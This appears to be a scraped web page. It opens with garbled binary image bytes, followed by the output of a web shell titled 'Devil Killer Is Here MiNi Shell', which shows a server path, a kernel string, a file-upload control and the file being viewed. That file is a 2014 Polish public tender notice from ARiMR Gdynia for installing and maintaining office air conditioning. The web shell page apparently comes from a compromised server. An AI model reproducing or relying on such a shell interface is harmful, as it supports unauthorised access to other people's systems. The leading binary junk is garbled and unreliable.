JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141030/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141030/361048-N-2014.html

<p class="kh_header"><b>Gdynia: ZAPROJEKTOWANIE, DOSTAWA I MONTAŻ SYSTEMÓW KLIMATYZACJI DLA POTRZEB POMORSKIEGO OR ARIMR ORAZ ŚWIADCZENIE USŁUGI PRZEGLĄDÓW GWARANCYJNYCH I KONSERWACJI SYSTEMÓW KLIMATYZACJI</b><br>
<b>Numer ogłoszenia: 361048 - 2014; data zamieszczenia: 30.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Restrukturyzacji i Modernizacji Rolnictwa Pomorski Oddział Regionalny , ul. Kołłątaja 1, 81-332 Gdynia, woj. pomorskie, tel. (0-58) 668-60-00/01, faks (0-58) 669-68-44.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.arimr.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa osoba prawna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZAPROJEKTOWANIE, DOSTAWA I MONTAŻ SYSTEMÓW KLIMATYZACJI DLA POTRZEB POMORSKIEGO OR ARIMR ORAZ ŚWIADCZENIE USŁUGI PRZEGLĄDÓW GWARANCYJNYCH I KONSERWACJI SYSTEMÓW KLIMATYZACJI.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest zaprojektowanie, dostawa i montaż systemów klimatyzacji do 40 pomieszczeń biurowych w Pomorskim Oddziale Regionalnym ARiMR w Gdyni ul. Kołłątaja 1, 81-332 Gdynia i do 5 pomieszczeń biurowych Słupskiego Biura Powiatowego ARiMR ul. Jana Pawła II 1,76-200 Słupsk oraz świadczenie usługi przeglądów gwarancyjnych i konserwacji systemów klimatyzacji.
2.Świadczenie usług przeglądów gwarancyjnych i konserwacji systemów klimatyzacji winno odbywać się w okresie 60 miesięcy w układzie zdarzeń: na początku każdego sezonu letniego, począwszy od maja 2015 r. (pierwszy przegląd) i na końcu każdego sezonu jesiennego, do listopada 2019 r. (ostatni przegląd). Przeglądy gwarancyjne i konserwacje obejmują dziesięć zdarzeń - przez zdarzenie rozumie się przegląd gwarancyjny i konserwację wszystkich dostarczonych i zainstalowanych w ramach niniejszego zamówienia urządzeń.
3.Kod Wspólnego Słownika Zamówień (CPV): 39.71.72.00-3, 45.33.12.20-4, 50.73.00.00-1.
4.Wymagania dotyczące wykonania dostawy i montażu systemów klimatyzacji:
1)Wszystkie montaże systemów klimatyzacji muszą być poprzedzone wykonaniem wstępnego projektu technicznego, a ich zakończenie wykonaniem projektu powykonawczego, które stanowią integralną część przedmiotu zamówienia.
2)Projekt powykonawczy powinien zawierać usytuowanie jednostek wewnętrznych i zewnętrznych, przebieg przewodów czynnika chłodzącego, przewodów odprowadzenia skroplin oraz instalacji zasilania wraz ze schematami podłączenia.
3)Po wyborze Wykonawcy Zamawiający udostępni posiadaną dokumentację pomocną do sporządzenia w/w projektów.
4)Wszystkie materiały, elementy i urządzenia stosowane do wykonania przedmiotu zamówienia powinny spełniać wymagania Polskich Norm, a w razie ich braku posiadać decyzje dopuszczające je do stosowania w budownictwie na terenie Unii Europejskiej (CE).
5)Wszystkie materiały, elementy i urządzenia muszą być fabrycznie nowe i posiadać dokumenty gwarancji producenckiej. Na miejsce montażu winny zostać dostarczone w fabrycznych opakowaniach.
6)Wyroby budowlane powinny odpowiadać wymogom wyrobów dopuszczonych do obrotu i stosowania w budownictwie określonych w art. 10 Ustawy Prawo Budowlane. Jakość materiałów i dokumentów powinna być potwierdzona odpowiednimi dokumentami.
7)Jednostki zewnętrzne należy montować zgodnie z dokumentacjami techniczno - ruchowymi dostarczonymi przez producenta urządzeń.
8)Sprężarki, wentylatory, zbiorniki oraz silniki elektryczne urządzeń powinny mieć trwale przymocowaną tabliczkę znamionową określającą:
a)Nazwę producenta,
b)Charakterystykę techniczną urządzenia,
c)Numer wyrobu i datę produkcji,
d)Znak kontroli technicznej.
9)Przed przystąpieniem do montażu należy sprawdzić stan techniczny urządzeń po transporcie i magazynowaniu.
10)Przy montażu należy bezwzględnie zachować wymagane odległości od ścian oraz pozostałych urządzeń, zapewnić stały, łatwy dostęp do włazów, otworów rewizyjnych, szachtów technicznych, etc. 
11)W siedzibie Pomorskiego OR w Gdyni jednostki wewnętrzne klimatyzatorów typu Multi-Split należy zamontować w 40 pomieszczeniach biurowych na trzech poziomach:
a)poziom najniższy  w 16 pomieszczeniach biurowych,
b)poziom średni w 19 pomieszczeniach biurowych,
c)poziom najwyższy w 5 pomieszczeniach biurowych.
12.W siedzibie Biura Powiatowego w Słupsku jednostki wewnętrzne klimatyzatorów typu Multi-Split należy zamontować w 5 pomieszczeniach biurowych na jednym poziomie.
13)Warunki montażu systemów klimatyzacji w pomieszczeniach Pomorskiego Oddziału Regionalnego ARiMR w Gdyni i Słupskiego Biura Powiatowego ARiMR przedstawia  Tabela nr 1.
14)Przewody poziome powinny być prowadzone w sposób umożliwiający ich (odwadnianie) w najniższych miejscach załamań przewodów.
15)Cała instalacja chłodnicza musi być  prowadzona w korytkach maskujących (instalacyjnych).
16)Przejścia przewodów przez stropy, dach i ściany konstrukcyjne należy wykonać w tulejach ochronnych.  W tulei ochronnej nie może być żadnych połączeń rur.
17)Instalacja chłodnicza między kondygnacjami musi być prowadzona w szachtach technicznych , przez ściany elewacyjne oraz w przestrzeni nad sufitem podwieszanym.
18)Rury w instalacji odprowadzającej skropliny należy łączyć przez zgrzewanie lub klejenie.
19)Roboty montażowe izolacji rurociągów należy wykonywać zgodnie z wymaganiami technicznymi.
20)Podłączenie jednostek zewnętrznych do instalacji należy wykonać po przeprowadzeniu prób jej szczelności.
21)Zalecana temperatura osiągana w pomieszczeniu - ok. 22 st. C.
22)Długość każdej instalacji chłodniczej i sterującej między jednostką wewnętrzną a zewnętrzną wynosi między ok. 20 mb a ok. 45 mb.
23)Wszystkie urządzenia w technologii INVERTER.
24)Długość każdej instalacji zasilającej do odpowiedniej rozdzielni wynosi ok. 45 mb.
25)Rozdzielnie muszą zostać wyposażone w zabezpieczenia różnicowo-prądowe dla każdego klimatyzatora.
26)Montaż jednostek zewnętrznych wymaga zastosowania podnośnika.
27)W przypadku montażu jednostek zewnętrznych do ściany budynku nad istniejącym poniżej dachem należy zachować odległość 20 cm od dachu.
28)Różnica wysokości pomiędzy jednostkami wewnętrznymi a zewnętrznymi wynosi ok. 10 metrów.
29)Po zakończonych pracach instalacyjnych Wykonawca przekaże Zamawiającemu protokoły z przeprowadzenia pomiarów elektrycznych nowo zainstalowanych urządzeń.
30)Urządzenia muszą być objęte 60 miesięczna gwarancją producenta.
31)Do odbiorów końcowych dostawy i montażu Wykonawca musi dołączyć:
a)Projekt techniczny powykonawczy z naniesionymi ewentualnymi zmianami 
w stosunku do projektu wstępnego,
b)Protokoły zakończone wynikiem pozytywnym wykonanych badań odbiorczych - pomiary rezystencji izolacji i zabezpieczeń przeciwporażeniowych,
c)Instrukcje Obsługi i gwarancje producenta urządzeń
32)Warunki konieczne przedmiotu zamówienia (minimalne parametry techniczne) określają:
a)Tabela nr 2 - dotyczy systemów MULTI-SPLIT (ścienne) umożliwiających podłączenie minimum dwóch jednostek wewnętrznych o długości po ok. 20 mb. instalacji chłodniczej do każdej jednostki zewnętrznej tj. 1 komplet ( 2 wewn. + 1 zewn.).
b)Tabela nr 3 - dotyczy systemów MULTI-SPLIT (ścienne) umożliwiających podłączenie minimum czterech jednostek wewnętrznych o długości po ok. 45 mb. instalacji chłodniczej do każdej jednostki zewnętrznej tj. 1 komplet ( 4 wewn. + 1 zewn.).
c)Tabela nr 4 - dotyczy systemów MULTI-SPLIT (ścienne) umożliwiających podłączenie minimum czterech/pięciu jednostek wewnętrznych o długości po ok. 30 mb. instalacji chłodniczej do każdej jednostki zewnętrznej tj. . 3 komplety ( 5 wewn. + 1 zewn.) oraz 6 kompletów (4 wewn. + 1 zewn).
33)Urządzenia muszą spełniać następujące ogólne parametry:
a)Klasa energetyczna chłodzenie/grzanie - minimum A/A,
b)Urządzenia musza posiadać ruchome kierownice strumienia powietrza, opcję (swing mode)oraz możliwość zatrzymania kierownic w wybranym położeniu - dotyczy jednostki wewnętrznej,
c)Urządzenia wyposażone w pompki skroplin celem odprowadzenia kondensatu na dach budynku - dotyczy jednostki wewnętrznej,
d)Urządzenia muszą być wyposażone w możliwość łatwej obsługi wszystkich parametrów pracy za pomocą dołączonego bezprzewodowego pilota z bateriami- dotyczy jednostki wewnętrznej.
Zamawiający preferuje urządzenia marki MDV lub urządzenia równoważne, np.: Samsung, Fujitsu, Mitsubishi, jednakże o parametrach technicznych nie gorszych od, przedstawionych w powyższych tabelach dla w/w marek, parametrów minimalnych.
Wykonawca obowiązany jest wypełnić kolumnę (C)tabel określających parametry techniczne w formularzu ofertowym - Załącznik nr 1 do Specyfikacji..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.71.72.00-3, 45.33.12.20-4, 50.73.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2019.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Oświadczenie z art. 22 ust. 1 ustawy - Prawo zamówień publicznych. Ocena spełniania w/w warunku udziału w postępowaniu dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w oświadczeniach lub dokumentach wyszczególnionych w rozdziale VII niniejszej specyfikacji. Z treści załączonych oświadczeń lub dokumentów musi wynikać jednoznacznie, iż w/w warunki wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Oświadczenie z art. 22 ust. 1 ustawy - Prawo zamówień publicznych. Warunek ten zostanie spełniony, jeśli Wykonawca wykaże, że wykonał co najmniej 2 (dwie) dostawy wraz z montażem urządzeń klimatyzacyjnych o wartości co najmniej 200 000,00 zł (słownie: dwieście tysięcy zł) brutto każda, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Oświadczenie z art. 22 ust. 1 ustawy - Prawo zamówień publicznych. Ocena spełniania w/w warunku udziału w postępowaniu dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w oświadczeniach lub dokumentach wyszczególnionych w rozdziale VII niniejszej specyfikacji. Z treści załączonych oświadczeń lub dokumentów musi wynikać jednoznacznie, iż w/w warunki wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie z art. 22 ust. 1 ustawy - Prawo zamówień publicznych. Warunek ten zostanie spełniony, jeśli Wykonawca wykaże, iż dysponuje co najmniej: a) jedną osobą posiadającą świadectwo kwalifikacyjne uprawniające do zajmowania się eksploatacją urządzeń, instalacji i sieci na stanowisku dozoru w zakresie kontrolno-pomiarowych dla następujących urządzeń, instalacji i sieci Grupy 1: 1) - Urządzenia, instalacje i sieci elektroenergetyczne wytwarzające, przetwarzające, przesyłające i zużywające energię elektryczną, 2) urządzenia, instalacje i sieci elektroenergetyczne o napięciu nie wyższym niż 1kV, b) dwoma osobami posiadającymi świadectwo kwalifikacyjne uprawniające do zajmowania się eksploatacją urządzeń, instalacji i sieci na stanowisku eksploatacji w zakresie  minimum montażu   dla następujących urządzeń, instalacji i sieci Grupy 1: 1) - Urządzenia, instalacje i sieci elektroenergetyczne wytwarzające, przetwarzające, przesyłające i zużywające energię elektryczną, 2) urządzenia, instalacje i sieci elektroenergetyczne o napięciu nie wyższym niż 1kV.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Oświadczenie z art. 22 ust. 1 ustawy - Prawo zamówień publicznych. Warunek ten zostanie spełniony, jeśli Wykonawca wykaże, iż posiada opłaconą polisę, a w przypadku jej braku, innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia - na łączną sumę co najmniej 300 000,00 zł (słownie: trzysta tysięcy złotych i 00/100).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	wypełniony Formularz ofertowy (wg Załącznika Nr 1 do specyfikacji),
2)	dokument wystawiony przez uprawniony podmiot potwierdzający, że urządzenie dopuszczone jest do stosowania, np. certyfikat CE,
3)	karty katalogowe oferowanych urządzeń w języku polskim,
4)	dokument gwarancyjny wystawiony przez producenta urządzeń potwierdzający
60-miesięczną gwarancję urządzeń,
5)	pełnomocnictwo (oryginał lub notarialnie potwierdzoną kopię) do reprezentowania wykonawcy, w tym do podpisywania dokumentacji ofertowej, jeżeli wykonawca jest reprezentowany niezgodnie z zapisem we właściwym rejestrze (dotyczy to również pełnomocnictwa do reprezentowania konsorcjum, spółki cywilnej).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
